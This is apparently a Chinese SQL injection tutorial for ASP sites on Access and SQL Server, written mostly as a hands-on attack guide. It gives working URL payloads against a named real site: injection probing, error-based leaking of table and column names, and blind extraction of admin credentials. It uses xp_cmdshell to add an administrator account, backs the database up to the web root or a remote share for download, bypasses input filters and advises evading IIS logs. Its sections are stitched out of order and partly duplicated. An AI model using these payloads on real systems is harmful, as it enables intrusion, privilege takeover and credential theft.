作用：與asc相反，根據ASCII碼返回字元

Access：mid(字元串,N,L) SQLServer：substring(字元串,N,L)

作用：返回字元串從N個字元起長度為L的子字元串，即N到N+L之間的字元串

Access：abc(數字) SQLServer：abc (數字)

作用：返回數字的絕對值（在猜解漢字的時候會用到）

Access：A between B And C SQLServer：A between B And C

作用：

判斷A是否界於B與C之間

第三節、中文處理方法

在注入中碰到中文字元是常有的事，有些人一碰到中文字元就想打退堂鼓了。其實只要對中文的編碼有所了解，「中文恐懼症」很快可以克服。

先說一點常識：

Access中，中文的ASCII碼可能會出現負數，取出該負數後用abs()取絕對值，漢字字元不變。

SQL Server中，中文的ASCII為正數，但由於是UNICODE的雙位編碼，不能用函數ascii()取得ASCII碼，必須用函數unicode ()返回unicode值，再用nchar函數取得對應的中文字元。

了解了上面的兩點後，是不是覺得中文猜解其實也跟英文差不多呢？除了使用的函數要注意、猜解范圍大一點外，方法是沒什麼兩樣的。

高級篇

看完入門篇和進階篇後，稍加練習，破解一般的網站是沒問題了。但如果碰到表名列名猜不到，或程序作者過濾了一些特殊字元，怎麼提高注入的成功率？怎麼樣提高猜解效率？請大家接著往下看高級篇。

第一節、利用系統表注入SQLServer資料庫

SQL Server是一個功能強大的資料庫系統，與操作系統也有緊密的聯系，這給開發者帶來了很大的方便，但另一方面，也為注入者提供了一個跳板，我們先來看看幾個具體的例子

：

① http://Site/url.asp?id=1;exec master..xp_cmdshell 「net user name password /add」--

分號;在SQLServer中表示隔開前後兩句語句，--表示後面的語句為注釋，所以，這句語句在SQLServer中將被分成兩句執行，先是Select出ID=1的記錄，然後執行存儲過程xp_cmdshell，這個存儲過程用於調用系統命令，於是，用net命令新建了用戶名為name、密碼為password的windows的帳號，接著：

② http://Site/url.asp?id=1;exec master..xp_cmdshell 「net localgroup name administrators /add」--

將新建的帳號name加入管理員組，不用兩分鍾，你已經拿到了系統最高許可權！當然，這種方法只適用於用sa連接資料庫的情況，否則，是沒有許可權調用xp_cmdshell的。

③ http://Site/url.asp?id=1 ;and db_name()>0

前面有個類似的例子and user>0，作用是獲取連接用戶名，db_name()是另一個系統變數，返回的是連接的資料庫名。

④ http://Site/url.asp?id=1;backup database 資料庫名 to disk=』c:\inetpub\wwwroot\1.db』;--

這是相當狠的一招，從③拿到的資料庫名，加上某些IIS出錯暴露出的絕對路徑，將資料庫備份到Web目錄下面，再用HTTP把整個資料庫就完完整整的下載回來，所有的管理員及用戶密碼都一覽無遺！在不知道絕對路徑的時候，還可以備份到網路地址的方法（如\202.96.xx.xx\Share \1.db），但成功率不高。

⑤ http://Site/url.asp?id=1 ;and (Select Top 1 name from sysobjects where xtype=』U』 and status>0)>0

前面說過，sysobjects是SQLServer的系統表，存儲著所有的表名、視圖、約束及其它對象，xtype=』U』 and status>0，表示用戶建立的表名，上面的語句將第一個表名取出，與0比較大小，讓報錯信息把表名暴露出來。第二、第三個表名怎麼獲取？還是留給我們聰明的讀者思考吧。

⑥ http://Site/url.asp?id=1 ;and (Select Top 1 col_name(object_id(『表名』),1) from sysobjects)>0

從⑤拿到表名後，用object_id(『表名』)獲取表名對應的內部ID，col_name(表名ID,1)代表該表的第1個欄位名，將1換成2,3,4...就可以逐個獲取所猜解表裡面的欄位名。

以上6點是我研究SQLServer注入半年多以來的心血結晶，可以看出，對SQLServer的了解程度，直接影響著成功率及猜解速度。在我研究SQLServer注入之後，我在開發方面的水平也得到很大的提高，呵呵，也許安全與開發本來就是相輔相成的吧。

第二節、繞過程序限制繼續注入

在入門篇提到，有很多人喜歡用』號測試注入漏洞，所以也有很多人用過濾』號的方法來「防止」注入漏洞，這也許能擋住一些入門者的攻擊，但對SQL注入比較熟悉的人，還是可以利用相關的函數，達到繞過程序限制的目的。

在「SQL注入的一般步驟」一節中，我所用的語句，都是經過我優化，讓其不包含有單引號的；在「利用系統表注入SQLServer資料庫」中，有些語句包含有』號，我們舉個例子來看

看怎麼改造這些語句：

簡單的如where xtype=』U』，字元U對應的ASCII碼是85，所以可以用where xtype=char(85)代替；如果字元是中文的，比如where name=』用戶』，可以用where name=nchar(29992)+nchar(25143)代替。

第三節、經驗小結

1.有些人會過濾Select、Update、Delete這些關鍵字，但偏偏忘記區分大小寫，所以大家可以用selecT這樣嘗試一下。

2.在猜不到欄位名時，不妨看看網站上的登錄表單，一般為了方便起見，欄位名都與表單的輸入框取相同的名字。

3.特別注意：地址欄的+號傳入程序後解釋為空格，%2B解釋為+號，%25解釋為%號，具體可以參考URLEncode的相關介紹。

4.用Get方法注入時，IIS會記錄你所有的提交字元串，對Post方法做則不記錄，所以能用Post的網址盡量不用Get。

5. 猜解Access時只能用Ascii逐字解碼法，SQLServer也可以用這種方法，只需要兩者之間的區別即可，但是如果能用SQLServer的報錯信息把值暴露出來，那效率和准確率會有極大的提高。

防範方法

SQL注入漏洞可謂是「千里之堤，潰於蟻穴」，這種漏洞在網上極為普遍，通常是由於程序員對注入不了解，或者程序過濾不嚴格，或者某個參數忘記檢查導致。在這里，我給大家一個函數，代替ASP中的Request函數，可以對一切的SQL注入Say NO，函數如下：

Function SafeRequest(ParaName,ParaType)
'--- 傳入參數 ---
'ParaName:參數名稱-字元型
'ParaType:參數類型-數字型(1表示以上參數是數字，0表示以上參數為字元)

Dim ParaValue
ParaValue=Request(ParaName)
If ParaType=1 then
If not isNumeric(ParaValue) then
Response.write "參數" & ParaName & "必須為數字型！"
Response.end
End if
Else
ParaValue=replace(ParaValue,"'","''")
End if
SafeRequest=ParaValue
End function

⑽ 舉例說明SQL注入的一般過程！

如果你以前沒試過SQL注入的話，那麼第一步先把IE菜單=>工具=>Internet選項=>高級=>顯示友好 HTTP 錯誤信息前面的勾去掉。否則，不論伺服器返回什麼錯誤，IE都只顯示為HTTP 500伺服器錯誤，不能獲得更多的提示信息。

第一節、SQL注入原理

以下我們從一個網站www.19cn.com開始（註：本文發表前已徵得該站站長同意，大部分都是真實數據）。

在網站首頁上，有名為「IE不能打開新窗口的多種解決方法」的鏈接，地址為：http://www.19cn.com/showdetail.asp?id=49，我們在這個地址後面加上單引號』，伺服器會返回下面的錯誤提示：

Microsoft JET Database Engine 錯誤 '80040e14'
字元串的語法錯誤 在查詢表達式 'ID=49'' 中。
/showdetail.asp，行8

從這個錯誤提示我們能看出下面幾點：

1.網站使用的是Access資料庫，通過JET引擎連接資料庫，而不是通過ODBC。
2.程序沒有判斷客戶端提交的數據是否符合程序要求。
3.該SQL語句所查詢的表中有一名為ID的欄位。

從上面的例子我們可以知道，SQL注入的原理，就是從客戶端提交特殊的代碼，從而收集程序及伺服器的信息，從而獲取你想到得到的資料。

第二節、判斷能否進行SQL注入

看完第一節，有一些人會覺得：我也是經常這樣測試能否注入的，這不是很簡單嗎？其實，這並不是最好的方法，為什麼呢？

首先，不一定每台伺服器的IIS都返回具體錯誤提示給客戶端，如果程序中加了cint(參數)之類語句的話，SQL注入是不會成功的，但伺服器同樣會報錯，具體提示信息為處理 URL 時伺服器上出錯。請和系統管理員聯絡。

其次，部分對SQL注入有一點了解的程序員，認為只要把單引號過濾掉就安全了，這種情況不為少數，如果你用單引號測試，是測不到注入點的

那麼，什麼樣的測試方法才是比較准確呢？答案如下：

① http://www.19cn.com/showdetail.asp?id=49
② http://www.19cn.com/showdetail.asp?id=49 and 1=1
③ http://www.19cn.com/showdetail.asp?id=49 and 1=2

這就是經典的1=1、1=2測試法了，怎麼判斷呢？看看上面三個網址返回的結果就知道了：

可以注入的表現：

① 正常顯示（這是必然的，不然就是程序有錯誤了）
② 正常顯示，內容基本與①相同
③ 提示BOF或EOF（程序沒做任何判斷時）、或提示找不到記錄（判斷了rs.eof時）、或顯示內容為空（程序加了on error resume next）

不可以注入就比較容易判斷了，①同樣正常顯示，②和③一般都會有程序定義的錯誤提示，或提示類型轉換時出錯。

當然，這只是傳入參數是數字型的時候用的判斷方法，實際應用的時候會有字元型和搜索型參數，我將在中級篇的「SQL注入一般步驟」再做分析。

第三節、判斷資料庫類型及注入方法

不同的資料庫的函數、注入方法都是有差異的，所以在注入之前，我們還要判斷一下資料庫的類型。一般ASP最常搭配的資料庫是Access和SQLServer，網上超過99%的網站都是其中之一。

怎麼讓程序告訴你它使用的什麼資料庫呢？來看看：

SQLServer有一些系統變數，如果伺服器IIS提示沒關閉，並且SQLServer返回錯誤提示的話，那可以直接從出錯信息獲取，方法如下：

http://www.19cn.com/showdetail.asp?id=49 and user>0

這句語句很簡單，但卻包含了SQLServer特有注入方法的精髓，我自己也是在一次無意的測試中發現這種效率極高的猜解方法。讓我看來看看它的含義：首先，前面的語句是正常的，重點在and user>0，我們知道，user是SQLServer的一個內置變數，它的值是當前連接的用戶名，類型為nvarchar。拿一個nvarchar的值跟int的數0比較，系統會先試圖將nvarchar的值轉成int型，當然，轉的過程中肯定會出錯，SQLServer的出錯提示是：將nvarchar值 」abc」 轉換數據類型為 int 的列時發生語法錯誤，呵呵，abc正是變數user的值，這樣，不廢吹灰之力就拿到了資料庫的用戶名。在以後的篇幅里，大家會看到很多用這種方法的語句。

順便說幾句，眾所周知，SQLServer的用戶sa是個等同Adminstrators許可權的角色，拿到了sa許可權，幾乎肯定可以拿到主機的Administrator了。上面的方法可以很方便的測試出是否是用sa登錄，要注意的是：如果是sa登錄，提示是將」dbo」轉換成int的列發生錯誤，而不是」sa」。

如果伺服器IIS不允許返回錯誤提示，那怎麼判斷資料庫類型呢？我們可以從Access和SQLServer和區別入手，Access和SQLServer都有自己的系統表，比如存放資料庫中所有對象的表，Access是在系統表[msysobjects]中，但在Web環境下讀該表會提示「沒有許可權」，SQLServer是在表[sysobjects]中，在Web環境下可正常讀取。

在確認可以注入的情況下，使用下面的語句：

http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from sysobjects)>0
http://www.19cn.com/showdetail.asp?id=49 and (select count(*) from msysobjects)>0

如果資料庫是SQLServer，那麼第一個網址的頁面與原頁面http://www.19cn.com/showdetail.asp?id=49是大致相同的；而第二個網址，由於找不到表msysobjects，會提示出錯，就算程序有容錯處理，頁面也與原頁面完全不同。

如果資料庫用的是Access，那麼情況就有所不同，第一個網址的頁面與原頁面完全不同；第二個網址，則視乎資料庫設置是否允許讀該系統表，一般來說是不允許的，所以與原網址也是完全不同。大多數情況下，用第一個網址就可以得知系統所用的資料庫類型，第二個網址只作為開啟IIS錯誤提示時的驗證。
第一節、SQL注入的一般步驟

首先，判斷環境，尋找注入點，判斷資料庫類型，這在入門篇已經講過了。

其次，根據注入參數類型，在腦海中重構SQL語句的原貌，按參數類型主要分為下面三種：

(A) ID=49 這類注入的參數是數字型，SQL語句原貌大致如下：
Select * from 表名 where 欄位=49
注入的參數為ID=49 And [查詢條件]，即是生成語句：
Select * from 表名 where 欄位=49 And [查詢條件]

(B) Class=連續劇 這類注入的參數是字元型，SQL語句原貌大致概如下：
Select * from 表名 where 欄位=』連續劇』
注入的參數為Class=連續劇』 and [查詢條件] and 『』=』 ，即是生成語句：
Select * from 表名 where 欄位=』連續劇』 and [查詢條件] and 『』=』』

(C) 搜索時沒過濾參數的，如keyword=關鍵字，SQL語句原貌大致如下：
Select * from 表名 where 欄位like 』%關鍵字%』
注入的參數為keyword=』 and [查詢條件] and 『%25』=』， 即是生成語句：
Select * from 表名 where欄位like 』%』 and [查詢條件] and 『%』=』%』

接著，將查詢條件替換成SQL語句，猜解表名，例如：

ID=49 And (Select Count(*) from Admin)>=0

如果頁面就與ID=49的相同，說明附加條件成立，即表Admin存在，反之，即不存在（請牢記這種方法）。如此循環，直至猜到表名為止。

表名猜出來後，將Count(*)替換成Count(欄位名)，用同樣的原理猜解欄位名。

有人會說：這里有一些偶然的成分，如果表名起得很復雜沒規律的，那根本就沒得玩下去了。說得很對，這世界根本就不存在100%成功的黑客技術，蒼蠅不叮無縫的蛋，無論多技術多高深的黑客，都是因為別人的程序寫得不嚴密或使用者保密意識不夠，才有得下手。

有點跑題了，話說回來，對於SQLServer的庫，還是有辦法讓程序告訴我們表名及欄位名的，我們在高級篇中會做介紹。

最後，在表名和列名猜解成功後，再使用SQL語句，得出欄位的值，下面介紹一種最常用的方法－Ascii逐字解碼法，雖然這種方法速度很慢，但肯定是可行的方法。

我們舉個例子，已知表Admin中存在username欄位，首先，我們取第一條記錄，測試長度：

http://www.19cn.com/showdetail.asp?id=49 and (select top 1 len(username) from Admin)>0

先說明原理：如果top 1的username長度大於0，則條件成立；接著就是>1、>2、>3這樣測試下去，一直到條件不成立為止，比如>7成立，>8不成立，就是len(username)=8

當然沒人會笨得從0,1,2,3一個個測試，怎麼樣才比較快就看各自發揮了。在得到username的長度後，用mid(username,N,1)截取第N位字元，再asc(mid(username,N,1))得到ASCII碼，比如：

id=49 and (select top 1 asc(mid(username,1,1)) from Admin)>0

同樣也是用逐步縮小范圍的方法得到第1位字元的ASCII碼，注意的是英文和數字的ASCII碼在1-128之間，可以用折半法加速猜解，如果寫成程序測試，效率會有極大的提高。

第二節、SQL注入常用函數

有SQL語言基礎的人，在SQL注入的時候成功率比不熟悉的人高很多。我們有必要提高一下自己的SQL水平，特別是一些常用的函數及命令。

Access：asc(字元) SQLServer：unicode(字元)
作用：返回某字元的ASCII碼

Access：chr(數字) SQLServer：nchar(數字)
作用：與asc相反，根據ASCII碼返回字元

Access：mid(字元串,N,L) SQLServer：substring(字元串,N,L)
作用：返回字元串從N個字元起長度為L的子字元串，即N到N+L之間的字元串

Access：abc(數字) SQLServer：abc (數字)
作用：返回數字的絕對值（在猜解漢字的時候會用到）

Access：A between B And C SQLServer：A between B And C
作用：判斷A是否界於B與C之間

第三節、中文處理方法

在注入中碰到中文字元是常有的事，有些人一碰到中文字元就想打退堂鼓了。其實只要對中文的編碼有所了解，「中文恐懼症」很快可以克服。

先說一點常識：

Access中，中文的ASCII碼可能會出現負數，取出該負數後用abs()取絕對值，漢字字元不變。

SQLServer中，中文的ASCII為正數，但由於是UNICODE的雙位編碼，不能用函數ascii()取得ASCII碼，必須用函數unicode ()返回unicode值，再用nchar函數取得對應的中文字元。